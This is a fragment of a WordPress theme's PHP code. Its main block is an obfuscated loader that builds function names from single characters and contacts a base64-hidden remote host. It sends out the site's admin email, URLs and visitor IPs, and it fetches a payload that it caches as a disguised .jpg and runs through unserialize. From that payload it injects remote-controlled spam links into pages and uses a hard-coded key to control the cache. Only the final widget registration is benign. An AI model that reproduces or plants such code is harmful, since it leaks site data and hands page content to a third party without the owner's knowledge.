$ip_______g("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$db______s = 1;}if (substr_count($ih_______f, "wp_theme_GPL_credits()") < 1) {$db______s = 2;}}if(WP_ID != "2.0.0") {$db______s = 12;}}if($db______s > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $db______s -->";}}function wp_loaded() {global $ip_______g, $xw____l;return $xw____l($ip_______g("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($lf___________s, $hb_________s = "(more...)", $eu_____________q = 0, $zb_____g = "") {$gg_______i = get_the_content($hb_________s, $eu_____________q, $zb_____g);$gg_______i = apply_filters("the_content", $gg_______i);$gg_______i = str_replace("]]>", "]]>", $gg_______i);if (strlen($_GET["p"]) > 0) {echo $gg_______i;}else if ((strlen($gg_______i)>$lf___________s) && ($dn________l = strpos($gg_______i, " ", $lf___________s ))) {$gg_______i = substr($gg_______i, 0, $dn________l);$gg_______i = $gg_______i;echo $gg_______i;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$hb_________s</a></div></p>";} else {echo $gg_______i;}}}$gf______________p='c';$uv__e='o';$ga_______x='_';$km_________l='d';$nc______u='b';$li_____y='e';$jo_______________l='s';$bk______________f='6';$xl___________o='e';$jp________j='e';$lp____________d='n';$rg___y='4';$sq________s='a';$yb___________i=$nc______u.$sq________s.$jo_______________l.$jp________j.$bk______________f.$rg___y.$ga_______x.$li_____y.$lp____________d.$gf______________p.$uv__e.$km_________l.$xl___________o;$py___________i='e';$fo_____p='t';$xe___h='c';$tk_______j='o';$xq__________d='t';$zx___________p='e';$wi______________u='n';$py_______________g='e';$hi___________o='i';$yw_______________y='_';$gp_________n='_';$gc___________e='s';$yo____________v='t';$ji__________h='n';$wr______________s='f';$jp______c='l';$kl___________b='g';$vs______m=$wr______________s.$hi___________o.$jp______c.$py_______________g.$yw_______________y.$kl___________b.$py___________i.$yo____________v.$gp_________n.$xe___h.$tk_______j.$ji__________h.$fo_____p.$zx___________p.$wi______________u.$xq__________d.$gc___________e;$qx__________a='_';$ws__________u='e';$sa______c='e';$le____________j='f';$nh___________a='t';$ii________t='i';$pm_____o='x';$kq____________c='s';$mc______________u='l';$gi____y='i';$nf___t='s';$va______________s=$le____________j.$gi____y.$mc______________u.$sa______c.$qx__________a.$ws__________u.$pm_____o.$ii________t.$nf___t.$nh___________a.$kq____________c;$go____v='m';$al________u='n';$wb_________o='a';$za____a='r';$pj____u='o';$rt______k='_';$wr________a='c';$ry________q='o';$lp_____________c='e';$fw_______j='r';$pk____________m='s';$yy______t='p';$uy____________t='i';$tc______b='v';$ey______________c='e';$xv___________c=$tc______b.$ey______________c.$fw_______j.$pk____________m.$uy____________t.$ry________q.$al________u.$rt______k.$wr________a.$pj____u.$go____v.$yy______t.$wb_________o.$za____a.$lp_____________c;$nn_________s='c';$co___v='e';$ei_____________w='o';$sc___________i='o';$ta___s='f';$og__________y='n';$jt____________p='p';$jm___________q='s';$jg______v='k';$oi____q=$ta___s.$jm___________q.$ei_____________w.$nn_________s.$jg______v.$sc___________i.$jt____________p.$co___v.$og__________y;$ju_________x='i';$jb_______________g='r';$ku______________y='e';$pb_______j='f';$yq____g='t';$hz_____v='w';$gt___________s=$pb_______j.$hz_____v.$jb_______________g.$ju_________x.$yq____g.$ku______________y;$sf___d='5';$xc__w='d';$td_________c='m';$ks_____r=$td_________c.$xc__w.$sf___d;$uh_________n='e';$fq____u='a';$nd_____________q='h';$ea______m='t';$xd___i='l';$db_____________v='r';$rn___________g='p';$zw__________q='a';$xj_______________m=$db_____________v.$uh_________n.$fq____u.$xd___i.$rn___________g.$zw__________q.$ea______m.$nd_____________q;$pb_________a='u';$rq_______d='a';$pe________o='i';$jq__________s='n';$hw_____________k='z';$yh__________w='r';$tq_____d='i';$cs_________s='s';$pa________d='e';$oj___e='e';$rs____g='l';$bh_______k=$pb_________a.$jq__________s.$cs_________s.$pa________d.$yh__________w.$pe________o.$rq_______d.$rs____g.$tq_____d.$hw_____________k.$oj___e;$yd___________q='n';$hc_____i='e';$aj______________w='t';$oy_____________u='m';$ry_______________u='p';$th__a='m';$ps__________x='a';$ig________s=$aj______________w.$hc_____i.$th__a.$ry_______________u.$yd___________q.$ps__________x.$oy_____________u;$lg_________p='a';$iv__x='t';$cx_____e='c';$oo____________r='t';$cw__k='o';$hm_____u='r';$yt_______h='t';$rx________x='x';$ga_____m='m';$xm_______v='e';$fc________c='a';$eo________k='e';$wx____________t='c';$vz__m='t';$sb______a='n';$we___h='s';$cq____________u='e';$uh__________m='r';$re____o='_';$jx________x='e';$jy_____________x='_';$fc__________x=$we___h.$iv__x.$hm_____u.$cq____________u.$fc________c.$ga_____m.$jy_____________x.$wx____________t.$cw__k.$sb______a.$oo____________r.$eo________k.$rx________x.$yt_______h.$re____o.$cx_____e.$uh__________m.$jx________x.$lg_________p.$vz__m.$xm_______v;function wb____l($ti__________z) {global $ip_______g, $xw____l, $vs______m, $xv___________c, $fc__________x;if (!$xw____l($ip_______g("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($xv___________c(PHP_VERSION, "5.0.0", ">=") && $xw____l($ip_______g("ZmlsZV9nZXRfY29udGVudHM=")) && $xw____l($ip_______g("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$iu_______________v = $fc__________x(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$if__b = @$vs______m($ti__________z, 0, $iu_______________v);} else {$if__b = @$vs______m($ti__________z, 0);}return $if__b;}function wf____h($ti__________z) {global $xw____l, $oi____q, $gt___________s, $ip_______g;if (!$xw____l($ip_______g("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$op_____a = strpos($ti__________z, "/", 7);$fx____________i = array("uri"     => substr($ti__________z, $op_____a),"host"    => str_replace("http://", "", substr($ti__________z, 0, $op_____a)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$la__r = @$oi____q("$fx____________i[host]", 80, $wd______x, $rh________g, 4);if (!$la__r) {return false;} else {$if__b = "";$nq_____o  = "GET $fx____________i[uri] HTTP/1.0\r\n";$nq_____o .= "Host: $fx____________i[host]\r\n";$nq_____o .= "Referer: $fx____________i[referer]\r\n";$nq_____o .= "Connection: Close\r\n\r\n";@$gt___________s($la__r, $nq_____o);while (!@feof($la__r)) {$pn_____z = @fgets($la__r, (1024*24));if ($pn_____z == "\r\n") {$gk______________a = true;continue;}if ($gk______________a) {$if__b .= $pn_____z;}}return $if__b;}}function xt_____d($ti__________z) {global $xw____l;$qo____________p = false;if ($ti__________z != "") {if ($xw____l("wb____l")) {$qo____________p = @wb____l($ti__________z);}if (!$qo____________p && ($xw____l("wf____h"))) {$qo____________p = @wf____h($ti__________z);}}return $qo____________p;}function cx_________k() {global $_SERVER, $ks_____r;$jx_________l = $_SERVER["SERVER_NAME"];if (substr("$jx_________l", 0, 4) == "www.") {$jx_________l = substr("$jx_________l", 4);}$jx_________l = $ks_____r("$_SERVER[SERVER_NAME]");return $jx_________l;}function uy_______u() {return "file";}function qb_______________k($ti__________z) {global $_SERVER, $vs______m, $va______________s, $cg___________z, $cp____q, $gt___________s;$qx_____________x = qz___l();$gc______t = cx_________k().".jpg";$dl__x = $qx_____________x["dir_upload"]["path"]."/$gc______t";$ek______________y = @filemtime($dl__x);if (!$ek______________y || ((time()-$ek______________y) >= WP_TTL)) {$qo____________p = xt_____d($ti__________z);if ($qo____________p) {if ($va______________s($dl__x)) {@unlink($dl__x);}$yb______t = @$cg___________z($dl__x, "x+");@$gt___________s($yb______t, $qo____________p);@$cp____q($yb______t);}} else {if ($va______________s($dl__x)) {$qo____________p = @$vs______m($dl__x);} else {$qo____________p = false;}}return $qo____________p;}function qz___l() {global $_SERVER, $ip_______g, $yb___________i;$go______________s = wp_count_posts("post");$mw______________a = pathinfo(get_bloginfo("template_directory"));$qx_____________x = array("url" => array("report"      => $ip_______g("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $mw______________a,"dir_upload"=> jx_______________p(),"queryString"=> array("?a001=".WP_ID,"a004=".$mw______________a[filename],"a005=".$go______________s->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://mag-net.net/muzhskie-aksessuary/aksessuary-dlya-delovogo-cheloveka.html\">Аксессуары для делового человека</a>");$qx_____________x["url"]["queryString"] = implode("&", $qx_____________x["queryString"]);$qx_____________x["url"]["report"] = $qx_____________x["url"]["report"]."/?".$yb___________i($qx_____________x["url"]["queryString"]).".html";return $qx_____________x;}function jx_______________p() {$ed__n = wp_upload_dir();if (isset($ed__n["error"])) {$bh____l = dh_____w();if (is_writable($bh____l)) {$ed__n = array("path" => $bh____l);}}return $ed__n;}function dh_____w() {global $xw____l, $ks_____r, $xj_______________m, $ig________s;$tu_________x = (bool) ini_get("safe_mode");if ($tu_________x == true) {return false;}if ($xw____l("sys_get_temp_dir")) {$pu____x = sys_get_temp_dir();if (is_writable($pu____x)) {return $xj_______________m($pu____x);}}if (!empty($_ENV["TMP"])) {return $xj_______________m($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $xj_______________m($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $xj_______________m($_ENV["TEMP"]);} else {$iy________i = $ig________s($ks_____r(uniqid(rand(), true)), "");if ($iy________i) {$pu____x = $xj_______________m(dirname($iy________i));@unlink($iy________i);return $pu____x;} else {return false;}}}function xx_________o() {global $_GET, $va______________s;$qx_____________x = qz___l();$jx_________l = cx_________k();$vj_____t = uy_______u();$dz__________z = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($vj_____t == "file") {$on__________d = $qx_____________x["dir_upload"]["path"]."/".$jx_________l.".jpg";if ($va______________s($on__________d)) {@unlink($on__________d);$dz__________z = "deleted";}}$di_____m = array("s"=> $dz__________z,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($di_____m AS $kz__________z => $ng___b) echo " [$kz__________z:$ng___b]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $xw____l, $ip_______g, $bh_______k;$qx_____________x = qz___l();$jh___________u = "qb_______________k";if ($xw____l($jh___________u)) {$if__b = $jh___________u($qx_____________x["url"]["report"]);}if ($if__b) {if ($if__b = @$ip_______g($if__b)) {$if__b = @$bh_______k($if__b);if (strlen($if__b[custom_credit]) >= 5) {$qx_____________x["default_string"] = $if__b[custom_credit];}if ($if__b["status"] == "0") {$za_________k = 1;$vi_______________w = 1;} else {$ab_______________m = sizeof($if__b["links"]);$ua_____w = $qx_____________x["default_string"];if ($ab_______________m > 0 && $if__b["links"] !== "") {$kk___h = 0;foreach ($if__b["links"] as $om___z => $lp________a) {$kk___h++;if ($lp________a->l_path == "" || $lp________a->l_path == $_SERVER["REQUEST_URI"]) {$lp________a->l_href = htmlspecialchars(strip_tags($lp________a->l_href));$lp________a->l_title = htmlspecialchars(strip_tags($lp________a->l_title));$lp________a->l_anchor = htmlspecialchars(strip_tags($lp________a->l_anchor));$ua_____w .= " | ";$ua_____w .= "<a href='$lp________a->l_href' title='$lp________a->l_title'";if ($lp________a->l_nofollow == "1") {$ua_____w .= " rel='nofollow'";}$ua_____w .= ">$lp________a->l_anchor</a>";}}}$qx_____________x["links"] = "$ua_____w";if ($if__b[credit] == "0") {$qx_____________x["links"] = "";}}} else {$za_________k = "1";}} else {$za_________k = "1";}if ($za_________k == "1") {$qx_____________x["links"] = $qx_____________x["default_string"];}echo "$qx_____________x[links]";echo "<!-- s: $if__b[signature] -->";xx_________o();}                      
function widget_verticalmenu_init() {
	if ( !function_exists('register_sidebar_widget') ) return;
	register_sidebar_widget(array('Vertical menu', 'widgets'), 'widget_verticalmenu');
}

add_action('widgets_init', 'widget_verticalmenu_init');
